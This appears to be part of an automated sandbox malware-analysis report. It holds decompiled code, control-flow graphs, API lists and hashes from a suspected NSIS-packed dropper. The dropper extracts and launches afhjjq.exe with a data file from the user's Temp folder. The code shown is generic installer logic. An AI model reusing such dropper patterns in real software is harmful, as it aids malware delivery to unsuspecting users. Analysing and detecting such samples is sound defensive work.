                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                            • String ID: "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                            • API String ID: 1975747703-2468761926
                            • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                            • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                            • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                            • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004030D0 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 204memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 341 403322-403327 334->341 342 403257-40325a 334->342 337 403163-40317a 335->337 339 40317c 337->339 340 40317e-403187 call 4035e2 337->340 339->340 348 40318d-403194 340->348 349 4032de-4032e6 call 40302e 340->349 341->327 344 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 342->344 345 40325c-403274 call 4035f8 call 4035e2 342->345 373 4032d4-4032d9 344->373 374 4032e8-403318 call 4035f8 call 403371 344->374 345->341 368 40327a-403280 345->368 353 403210-403214 348->353 354 403196-4031aa call 406113 348->354 349->341 358 403216-40321d call 40302e 353->358 359 40321e-403224 353->359 354->359 371 4031ac-4031b3 354->371 358->359 364 403233-40323b 359->364 365 403226-403230 call 406b22 359->365 364->337 372 403241 364->372 365->364 368->341 368->344 371->359 377 4031b5-4031bc 371->377 372->334 373->327 383 40331d-403320 374->383 377->359 379 4031be-4031c5 377->379 379->359 380 4031c7-4031ce 379->380 380->359 382 4031d0-4031f0 380->382 382->341 384 4031f6-4031fa 382->384 383->341 385 403329-40333a 383->385 386 403202-40320a 384->386 387 4031fc-403200 384->387 388 403342-403347 385->388 389 40333c 385->389 386->359 390 40320c-40320e 386->390 387->372 387->386 391 403348-40334e 388->391 389->388 390->359 391->391 392 403350-403368 call 406113 391->392 392->327
                            C-Code - Quality: 98%
                            			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				void* _t102;
				void* _t106;
				long _t107;
				long _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(0x436800, L"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe");
				E00406668(0x439000, E00405F83(0x436800));
				_t54 = GetFileSize(_t106, 0);
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					if( *0x42a274 == _t94) {
						goto L32;
					}
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\alfons\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							if(_t68 == _v20) {
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
								} while (_t102 != 0);
								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
								E00406113(0x42a280, _t111 + 4, 0x40);
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
						goto L32;
					} else {
						goto L28;
					}
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						if(E004035E2(0x418ef0, _t107) == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a274 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42a274 =  *0x420ef0;
							if(_t92 > _t110) {
								goto L32;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t110 = _t92 - 4;
								if(_t107 > _t110) {
									_t107 = _t110;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t110 <  *0x420f00) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
					} while (_t110 != 0);
					_t94 = 0;
					goto L24;
				}
			}




























                            0x004030db
                            0x004030de
                            0x004030e1
                            0x004030fb
                            0x00403100
                            0x00403113
                            0x00403118
                            0x0040311e
                            0x00000000
                            0x00403120
                            0x00403131
                            0x00403142
                            0x00403149
                            0x00403151
                            0x00403156
                            0x00403158
                            0x00403243
                            0x00403245
                            0x00403251
                            0x00000000
                            0x00000000
                            0x0040325a
                            0x00403286
                            0x0040328b
                            0x00403296
                            0x00403298
                            0x004032a9
                            0x004032c4
                            0x004032cd
                            0x004032d2
                            0x004032f1
                            0x00403301
                            0x00403313
                            0x00403318
                            0x00403320
                            0x0040332d
                            0x00403335
                            0x0040333a
                            0x0040333c
                            0x0040333c
                            0x00403344
                            0x00403344
                            0x00403347
                            0x00403348
                            0x00403348
                            0x0040334b
                            0x0040334d
                            0x0040334d
                            0x00403357
                            0x00403363
                            0x00000000
                            0x00403368
                            0x00000000
                            0x00403320
                            0x00000000
                            0x004032d4
                            0x00403262
                            0x00403274
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040315e
                            0x00403163
                            0x00403168
                            0x0040316c
                            0x00403173
                            0x0040317a
                            0x0040317c
                            0x0040317c
                            0x00403187
                            0x004032e0
                            0x00403322
                            0x00000000
                            0x00403322
                            0x00403194
                            0x00403214
                            0x00403218
                            0x0040321d
                            0x00000000
                            0x00403214
                            0x0040319d
                            0x004031a2
                            0x004031aa
                            0x004031d0
                            0x004031df
                            0x004031e5
                            0x004031ea
                            0x004031f0
                            0x00000000
                            0x00000000
                            0x004031fa
                            0x00403202
                            0x00403205
                            0x0040320a
                            0x0040320c
                            0x0040320c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004031fa
                            0x0040321e
                            0x00403224
                            0x00403230
                            0x00403230
                            0x00403233
                            0x00403239
                            0x00403239
                            0x00403241
                            0x00000000
                            0x00403241

                            APIs
                            • GetTickCount.KERNEL32 ref: 004030E4
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\YSpCB8DEek.exe,00000400), ref: 00403100
                              • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\YSpCB8DEek.exe,80000000,00000003), ref: 0040615C
                              • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\YSpCB8DEek.exe,C:\Users\user\Desktop\YSpCB8DEek.exe,80000000,00000003), ref: 00403149
                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\YSpCB8DEek.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                            • API String ID: 2803837635-52966638
                            • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                            • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                            • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                            • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040176F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145stringtimeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                            C-Code - Quality: 77%
                            			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"\"C:\\";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, 0x436000)), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668(0x40b5f8, _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\alfons\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, 0x40b5f8);
						_t64 = E00405CC8("C:\Users\alfons\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}


















                            0x0040176f
                            0x00401776
                            0x00401782
                            0x00401785
                            0x0040178a
                            0x0040178d
                            0x00401794
                            0x004017b0
                            0x00401796
                            0x00401797
                            0x00401797
                            0x004017b6
                            0x004017bb
                            0x004017bb
                            0x004017bf
                            0x004017c2
                            0x004017c7
                            0x004017c9
                            0x004017cb
                            0x004017d0
                            0x004017d0
                            0x004017db
                            0x004017db
                            0x004017ec
                            0x004017ee
                            0x004017ee
                            0x004017ef
                            0x004017ef
                            0x004017f2
                            0x004017f5
                            0x004017f8
                            0x004017f8
                            0x004017ff
                            0x0040180e
                            0x00401813
                            0x00401816
                            0x00401819
                            0x00000000
                            0x00000000
                            0x0040181b
                            0x0040181e
                            0x00401874
                            0x00401879
                            0x004015b6
                            0x0040292e
                            0x0040292e
                            0x00402c2a
                            0x00402c2d
                            0x00402c2d
                            0x00000000
                            0x00401820
                            0x00401826
                            0x0040182d
                            0x0040183a
                            0x00401845
                            0x0040185b
                            0x0040185b
                            0x0040185e
                            0x00000000
                            0x00401864
                            0x00401864
                            0x00401865
                            0x00401882
                            0x00402c33
                            0x00402c33
                            0x00402c33
                            0x00401867
                            0x00401867
                            0x00401868
                            0x00401493
                            0x0040239d
                            0x0040239d
                            0x0040239d
                            0x00401865
                            0x0040185e
                            0x00402c35
                            0x00402c39
                            0x00402c39
                            0x00401892
                            0x00401897
                            0x004018a5
                            0x004018aa
                            0x004018b0
                            0x004018b4
                            0x004018b6
                            0x004018be
                            0x004018ca
                            0x004018b8
                            0x004018b8
                            0x004018bc
                            0x00000000
                            0x00000000
                            0x004018bc
                            0x004018d3
                            0x004018d9
                            0x004018db
                            0x00000000
                            0x004018e1
                            0x004018e1
                            0x004018e4
                            0x004018fc
                            0x004018e6
                            0x004018e9
                            0x004018f2
                            0x004018f2
                            0x00401901
                            0x00401906
                            0x00402398
                            0x00000000
                            0x00402398
                            0x00000000

                            APIs
                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                            • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00000000,00000000,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00436000,?,?,00000031), ref: 004017D5
                              • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                              • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                            • String ID: "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq$C:\Users\user\AppData\Local\Temp
                            • API String ID: 1941528284-3160454279
                            • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                            • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                            • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                            • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                            C-Code - Quality: 100%
                            			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                            0x004069dc
                            0x004069e5
                            0x004069e7
                            0x004069e7
                            0x004069eb
                            0x004069fe
                            0x004069f8
                            0x004069f8
                            0x004069f8
                            0x00406a17
                            0x00406a2b
                            0x00406a32

                            APIs
                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                            • wsprintfW.USER32 ref: 00406A17
                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: DirectoryLibraryLoadSystemwsprintf
                            • String ID: %s%S.dll$UXTHEME$\
                            • API String ID: 2200240437-1946221925
                            • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                            • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                            • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                            • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 532 405b99-405be4 CreateDirectoryW 533 405be6-405be8 532->533 534 405bea-405bf7 GetLastError 532->534 535 405c11-405c13 533->535 534->535 536 405bf9-405c0d SetFileSecurityW 534->536 536->533 537 405c0f GetLastError 536->537 537->535
                            C-Code - Quality: 100%
                            			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                            0x00405ba4
                            0x00405ba8
                            0x00405bab
                            0x00405bb1
                            0x00405bb5
                            0x00405bb9
                            0x00405bc1
                            0x00405bc8
                            0x00405bce
                            0x00405bd5
                            0x00405bdc
                            0x00405be4
                            0x00405be6
                            0x00000000
                            0x00405be6
                            0x00405bf0
                            0x00405bf7
                            0x00405c0d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00405c0f
                            0x00405c13

                            APIs
                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                            • GetLastError.KERNEL32 ref: 00405BF0
                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                            • GetLastError.KERNEL32 ref: 00405C0F
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                            • String ID: C:\Users\user\AppData\Local\Temp\
                            • API String ID: 3449924974-823278215
                            • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                            • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
